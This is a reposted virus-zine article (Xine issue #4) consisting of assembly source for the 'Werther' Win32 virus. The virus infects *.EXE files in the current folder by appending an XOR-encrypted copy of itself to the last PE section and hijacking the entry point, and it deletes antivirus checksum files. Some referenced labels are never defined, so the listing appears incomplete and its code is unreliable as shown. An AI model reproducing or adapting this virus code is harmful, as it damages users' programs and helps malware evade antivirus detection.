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Xine - issue #4 - Phile 213

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Published in 
 · 4 May 2024

| Xine - issue #4 - Phile 213 |

; < < < < < < WERTHER Virus, coded by Int13h of IKX > > > > > >
; ___Random encrypted runtime portable executable last section expander___
; It deletes some AV checksum files.
; tasm /ml /m3 Werther,,;
; tlink32 -Tpe -c -v Werther,Werther,, import32.lib
.model flat
jumps ; Still lazy in 32 bits

Extrn ExitProcess:PROC

Location = 0BFF70000h ; Some kewl equates
Marker = 12
ImageBase = 52
EntryPRVA = 40
PhyOffset = 20
PhySize = 16
NumObjects = 06
RVA = 12
ObjAlign = 56
VirtSize = 08
FileAlign = 60
ImageSize = 80
SectSize = 40
ObjFlags = 36
Longitud1 = EnFiles-Codigo_Vivo
Longitud2 = EnMemoria-Codigo_Vivo
Saltar = Cifrado-Codigo_Vivo

db 'J. W. Goethe rules!' ; Fool data, just 4 tasm

INICIO: jmp Codigo_Vivo
Salida: push 00
call ExitProcess ; Just return to OS

CD13 segment para public 'INT13H'
assume cs:CD13

pushad ; Save all registers
call Delta ; For delta offset calculation
Delta: pop edi ; EDI=EIP
sub edi,offset Delta ; EDI=delta offset

lea esi,[edi+offset Cifrado]
mov ecx,((offset EnFiles-offset Cifrado)/2)+1
Decrypt:db 066h,081h,036h ; XOR WORD PTR [ESI],0
Clave dw 0
inc esi
inc esi ; Increment our index
loop Decrypt

Cifrado:mov eax,Location
cmp word ptr [eax],'ZM' ; Kernel32 isn't where expected
jne Kernel

push dword ptr [edi+Retorno+1] ; Stack return address

lea ebx,[edi+APIaddresses] ; Where to put the addresses
mov ecx,10 ; Ten APIs
lea edx,[edi+APIs] ; APIs we'll use
push ebx ecx edi ; I am using Star0's method
mov edi,Location ; to get APIs directly
mov esi,edi ; from KERNEL32.DLL
sub ebx,ebx
mov bx,word ptr [edi+03ch] ; Get offset of PE header
add edi,ebx
mov eax,666 ; Flag as bad
cmp dword ptr [edi],000004550h ; PE signture here?
jne Cancel ; Nope, leave
mov ebx,dword ptr [edi+120]
lea edi,[esi+ebx]
mov ecx,dword ptr [edi+24]
mov ebx,dword ptr [edi+32]
add ebx,esi
mov ebp,edx
mov eax,dword ptr [ebx]
add eax,esi
mov eax,dword ptr [eax]
cmp dword ptr [edx],eax
je ProbarNombre
Vamos: mov edx,ebp
add ebx,4
dec ecx
jnz BuscarCadena
mov eax,666 ; Sign an error
jmp Cancel
mov eax,dword ptr [ebx]
add eax,esi
push eax
mov al,byte ptr [eax]
cmp byte ptr [edx],al
pop eax
jne Vamos
inc eax
inc edx
cmp byte ptr [edx+1],0 ; Until the 0...
jne TestarNombre
mov al,byte ptr [eax]
cmp byte ptr [edx],al
jne Vamos
add edx,2
push edx
mov eax,dword ptr [edi+24]
sub eax,ecx
shl eax,1
add eax,dword ptr [edi+36]
sub ebx,ebx
add eax,esi
mov bx,word ptr [eax]
xchg ebx,eax
shl eax,2
add eax,dword ptr [edi+28]
add eax,esi
mov eax,dword ptr [eax] ; Get it
add eax,esi
pop edx
Cancel: pop edi ecx ebx
cmp eax,666 ; Not found
je Errare
xchg dword ptr [ebx],eax ; Save address
add ebx,4 ; And point to the next dword
loop FindAPIs

call PutInt24h ; Set Error Mode
call DeleteSuckers ; Delete AV files
lea eax,[edi+offset Win32FindData] ; The FindData structure
push eax
lea eax,[edi+offset Victimas] ; *.EXE
push eax
call dword ptr [edi+FindFirstFile] ; call the API
mov dword ptr [edi+SearcHandle],eax ; Save the search handle
Ciclo: cmp eax,0ffffffffh ; Ask for error
je Errare
or eax,eax ; No more files?
jz Errare

push 00
push 00000080h
push 03
push 00
push 00
push 0C0000000h
lea eax,[edi+offset Hallado] ; Open the found EXE
push eax
call dword ptr [edi+CreateFile]
cmp eax,-1
je Cerrar
mov dword ptr [edi+FileHandle],eax ; Save file handle

push 00
push 00
push 0000003ch ; Move pointer at offset 03ch
push eax
call dword ptr [edi+SetFilePointer]

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 04 ; Number of bytes to read
lea eax,dword ptr [edi+PEoffset] ; Where to read
push eax
push dword ptr [edi+FileHandle] ; Handle of our opened file
call dword ptr [edi+ReadFile]

push 00
push 00
push dword ptr [edi+PEoffset] ; Move pointer to PE
push dword ptr [edi+FileHandle] ; header location
call dword ptr [edi+SetFilePointer]

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 000008F8h
lea eax,dword ptr [edi+PEHeader] ; Read the PE header
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+ReadFile]

cmp word ptr [edi+PEHeader],04550h ; Is it a PE?
jne Cerrar

cmp word ptr [edi+PEHeader+Marker],0cd13h ; Already infected?
je Cerrar

sub eax,eax
mov ax,word ptr [edi+PEHeader+NumObjects]
dec ax ; Number of Objects-1
mov ecx,SectSize ; Section size=40 bytes
mul ecx ; Calcule RVA for the
push eax ; last section
pop esi
lea esi,[edi+esi+PEHeader+0F8h] ; ESI will point there

mov ecx,dword ptr [edi+PEHeader+ImageBase]
add ecx,dword ptr [edi+PEHeader+EntryPRVA]
mov dword ptr [edi+Retorno+1],ecx ; Save the hoste's return

mov eax,dword ptr [esi+PhyOffset]
add eax,dword ptr [esi+PhySize]
push eax ; We must write virus here

mov eax,dword ptr [esi+RVA]
add eax,dword ptr [esi+PhySize] ; Calculate the new entry point
mov dword ptr [edi+PEHeader+EntryPRVA],eax

mov ecx,dword ptr [edi+PEHeader+ObjAlign]
mov eax,dword ptr [esi+VirtSize]
add eax,Longitud2 ; Expand the last section
xor edx,edx ; virtual size
div ecx
inc eax
mul ecx
mov dword ptr [esi+VirtSize],eax

mov ecx,dword ptr [edi+PEHeader+FileAlign]
mov eax,dword ptr [esi+PhySize]
add eax,Longitud1 ; Expand the physical size
sub edx,edx ; of our last section
div ecx ; (room for virus)
inc eax
mul ecx
mov dword ptr [esi+PhySize],eax

mov dword ptr [esi+ObjFlags],0E0000000h
mov ecx,dword ptr [edi+PEHeader+FileAlign]
mov eax,dword ptr [edi+PEHeader+ImageSize]
add eax,Longitud2
sub edx,edx
div ecx
inc eax
mul ecx ; Update image size (+virus)
mov dword ptr [edi+PEHeader+ImageSize],eax
mov word ptr [edi+PEHeader+Marker],0cd13h ; Mark as infected!

pop eax
push 00
push 00
push eax ; Move to place for virus
push dword ptr [edi+FileHandle]
call dword ptr [edi+SetFilePointer]
or eax,eax
jz Cerrar

call Encryptor ; Generate encrypted virus copy

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
mov eax,Longitud1
push eax
lea eax,dword ptr [edi+CopiaVirus] ; Write virus there
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+WriteFile]
or eax,eax
jz Cerrar

push 00
push 00
push dword ptr [edi+PEoffset] ; Move to PE header offset
push dword ptr [edi+FileHandle]
call dword ptr [edi+SetFilePointer]
or eax,eax
jz Cerrar

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 000008F8h ; Write our modified header
lea eax,dword ptr [edi+PEHeader]
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+WriteFile]

Cerrar: push dword ptr [edi+FileHandle]
call dword ptr [edi+CloseHandle] ; Close the opened file

lea eax,[edi+offset Win32FindData]
push eax
push dword ptr [edi+SearcHandle]
call dword ptr [edi+FindNextFile] ; Look for the next one
jmp Ciclo

Errare: call RestoreInt24h
pop dword ptr [edi+Retorno+1] ; Original host's entry point
Kernel: popad
Retorno:mov eax,offset Salida
push eax ; EAX=EIP
ret ; Run hoste

DeleteSuckers: ; Delete AV files
lea esi,[edi+Borrar] ; Point to first one
mov ecx,4 ; We have 4 shits
Killer: push ecx
push esi
call dword ptr [edi+DeleteFile] ; Call our cool API
add esi,13 ; Point to next one
pop ecx
loop Killer

call dword ptr [edi+SetErrorMode]
mov dword ptr [edi+Anterior],eax ; Save old flags

db 0b8h
Anterior dd 0 ; Old ErrorMode state
push eax
call dword ptr [edi+SetErrorMode] ; Restore it

call dword ptr [edi+GetTickCount]
mov word ptr [edi+Clave],ax ; Get random keyword

push edi ; Save delta offset
lea esi,[edi+offset Codigo_Vivo] ; Copy virus to buffer
lea edi,[edi+offset CopiaVirus]
mov ecx,Longitud1
rep movsb
pop edi ; Recover delta from stack

lea esi,[edi+offset CopiaVirus+Saltar]
mov ecx,((offset EnFiles-offset Cifrado)/2)+1
Cifrar: xor word ptr [esi],ax ; Encrypt a word
inc esi
inc esi
loop Cifrar

APIs: db "FindFirstFileA",0
db "FindNextFileA",0
db "CreateFileA",0
db "SetFilePointer",0
db "ReadFile",0
db "WriteFile",0
db "CloseHandle",0
db "DeleteFileA",0
db "SetErrorMode",0
db "GetTickCount",0

FindFirstFile dd 0
FindNextFile dd 0
CreateFile dd 0
SetFilePointer dd 0
ReadFile dd 0
WriteFile dd 0
CloseHandle dd 0
DeleteFile dd 0
SetErrorMode dd 0
GetTickCount dd 0

TituloVentana db 'WERTHER VIRUS',0
TextoVentana db 'MaDe iN PaRaGuAy by Int13h/IKX',0
Victimas db '*.EXE',0
Borrar db 'AVP.CRC',0,0,0,0,0,0
db 'CHKLIST.MS',0,0,0
db 'CHKLIST.CPS',0,0
MsgToMyFriend db 'Star0: u r rite, stone coding must be prohibited! ;)'

EnFiles label byte ; Virus limit in files
;# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

SearcHandle dd 0 ; For FindFirst/Next
FileHandle dd 0 ; When opening the victims
NumOfBytesRead dd 0 ; For reading function
PEoffset dd 0 ; Offset of PE in files
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0 ; WIN32.FindData Structure
Hallado db 0100h dup (0) ; The found file
db 0100h dup (0)
PEHeader db 08F8h dup (0) ; For reading the header
CopiaVirus db 1000 dup (0) ; Buffer for encryption

EnMemoria label byte ; Virus limit in memory
;# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #


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